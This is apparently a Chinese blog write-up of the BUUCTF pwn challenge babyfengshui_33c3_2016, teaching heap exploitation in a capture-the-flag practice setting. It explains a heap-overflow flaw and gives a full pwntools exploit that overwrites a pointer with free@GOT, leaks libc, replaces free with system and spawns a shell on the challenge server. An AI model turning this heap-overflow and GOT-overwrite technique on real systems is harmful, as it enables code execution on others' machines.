• buuctf:babyfengshui_33c3_2016


    这是个一分题,但是还是蛮经典的,单独给一篇随笔来记录一下吧,想了挺久的

    逆向

    这个memset有被恶心到

    fgets后面追加0也被恶心到

    不逆了,反正还好,多调试一下就能摸清堆结构,然后主要的漏洞在于这个地方
    这个逻辑明显是不对的,假如我的堆管理结构在下方,但是我的堆本体在上方,那岂不是二者中间所有的堆块我都能溢出?
    所以这个就是一个漏洞,可以造成大规模堆溢出

    pwn it

    思路就是刚才提到的那个
    构造堆风水,布置结构
    一开始卡在了泄漏地址上,因为fgets自动补0,就没法利用printf的%s,然后就呆了一会儿
    弹了尤克里里之后忽然来思路了,我是zz,有堆管理结构,里面有现成的堆指针,我直接改堆指针为got表,然后就能leak了
    同时,改指针为got表,我也能获得可写能力
    那么简单竟然没想到,我服我自己了

    exp:

    from pwn import *
    from LibcSearcher import *
    
    local = 0
    
    binary = "babyfengshui_33c3_2016"
    libc_path = '../libc-2.23.so'
    port = "27912"
    
    if local == 1:
    	p = process(binary)
    else:
    	p = remote("node3.buuoj.cn",port)
    
    def dbg():
    	context.log_level = 'debug'
    
    context.terminal = ['tmux','splitw','-h']
    
    def add(des_size,name,text_size,text):
    	p.sendlineafter('Action: ','0')
    	p.sendlineafter('size of description: ',str(des_size))
    	p.sendafter('name: ',name)
    	p.sendlineafter('text length:',str(text_size))
    	p.sendafter('text: ',text)
    
    def show(index):
    	p.sendlineafter('Action: ','2')
    	p.sendlineafter('index: ',str(index))
    
    def edit(index,text_size,content):
    	p.sendlineafter('Action:','3')
    	p.sendlineafter('index: ',str(index))
    	p.sendlineafter('text length:',str(text_size))
    	p.sendafter('text:',content)
    
    def free(index):
    	p.sendlineafter('Action:','1')
    	p.sendlineafter('index:',str(index))
    
    elf = ELF(binary)
    
    free_got = elf.got['free']
    
    add(0x80,'lemon
    ',0x10,'aaaa
    ') # 0
    
    add(0x20,'protected
    ',0x18,'bbbb
    ') # 1
    add(0x40,'lemon
    ',0x10,'aaaa
    ') # 2
    add(0x20,'/bin/shx00 
    ',0x18,'cat flag
    ') # 3
    
    free(0)
    # dbg()
    
    add(0x100,' hackyou by heapoverflow lemon 
    ',0x20,' lemon :  ^_^  ~~~~~~ 
    ')	# 4
    
    # payload = 'a' * (0x8 + 0x100 + 0x30)
    payload = 'a' * (0x8 + 0x100) + p32(0x110) + p32(0x29)
    payload += p32(0) * 9 + p32(0x89) + p32(free_got)
    # dbg()
    log.success("PAYLOAD LENGTH:{}".format(hex(len(payload))))
    edit(4,len(payload) + 4, payload + 'aa
    ')
    
    show(1)
    
    leak = u32(p.recvuntil('xf7')[-4:])
    log.success("LEAK:{}".format(hex(leak)))
    
    libc = LibcSearcher('free',leak)
    libc_base = leak - libc.dump('free')
    system = libc_base + libc.dump('system')
    
    log.success("LIBC BASE:{}".format(hex(libc_base)))
    
    edit(1,5,p32(system) + '
    ')
    
    free(3)
    
    # gdb.attach(p)
    p.interactive()
    

    学到的东西

    有堆指针泄漏和edit都可以利用堆指针

  • 相关阅读:
    关于RadAsm中GetEnvironmentStrings的BUG。
    GetStartupInfo 反调试
    基于TLS的反调试技术
    几种RAID级别的比较
    常用的外网yum源之epel.repo
    常用yum源之(Percona MySQL)
    swap的几点理解
    solaris系统动态查看swap的使用情况
    一次CTS引发的网络故障
    一次goldengate故障引发的操作系统hang起,HA自动切换
  • 原文地址:https://www.cnblogs.com/lemon629/p/13966558.html
Copyright © 2020-2023  润新知